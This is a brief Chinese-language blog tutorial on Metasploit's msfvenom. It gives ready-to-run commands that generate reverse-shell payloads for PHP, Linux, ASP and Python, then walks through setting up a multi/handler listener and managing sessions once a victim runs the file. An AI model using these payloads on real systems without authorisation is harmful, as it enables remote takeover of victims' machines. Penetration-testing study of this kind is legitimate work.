msf-msfvenom

msfvenom:

攻击机

msfvenom -l payloads 查看payload
可以生成独立的有效负载(例如 Meterpreter 的 Windows 可执行文件)或获取可用的原始格式(例如 python)。该msfvenom --list formats命令可用于列出支持的输出格式

生成载荷:
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > reverse_shell.php //php
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > rev_shell.elf //linux
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > rev_shell.asp //asp
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > rev_shell.py //python

然后msfconsole要使用模块进行监听:
msf6 > use exploit/multi/handler
进行监听,并且要设置 lhost、lport 以及对应的payload(对应系统)

设置payload可根据目标的OS来选择,下面是gpt给出的payload:

  1. windows/meterpreter/reverse_tcp:用于攻击运行Windows操作系统的目标系统,使用反向TCP连接方式与Metasploit框架建立连接,并提供Meterpreter shell。
  2. linux/x86/meterpreter/reverse_tcp:用于攻击运行Linux操作系统的目标系统,使用反向TCP连接方式与Metasploit框架建立连接,并提供Meterpreter shell。
  3. osx/x86/shell_reverse_tcp:用于攻击运行macOS操作系统的目标系统,使用反向TCP连接方式与Metasploit框架建立连接,并提供shell访问权限。
  4. android/meterpreter/reverse_tcp:用于攻击运行Android操作系统的目标设备,使用反向TCP连接方式与Metasploit框架建立连接,并提供Meterpreter shell。

设置完毕后就可以 run

等待受害主机运行msfvenom生成的文件。

后期使用其他模块时,连续按ctrl z隐藏会话,选择要利用的模块,此时需要set session

通过 sessions查看当前会话数量以及会话id,然后set session,然后run即可

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注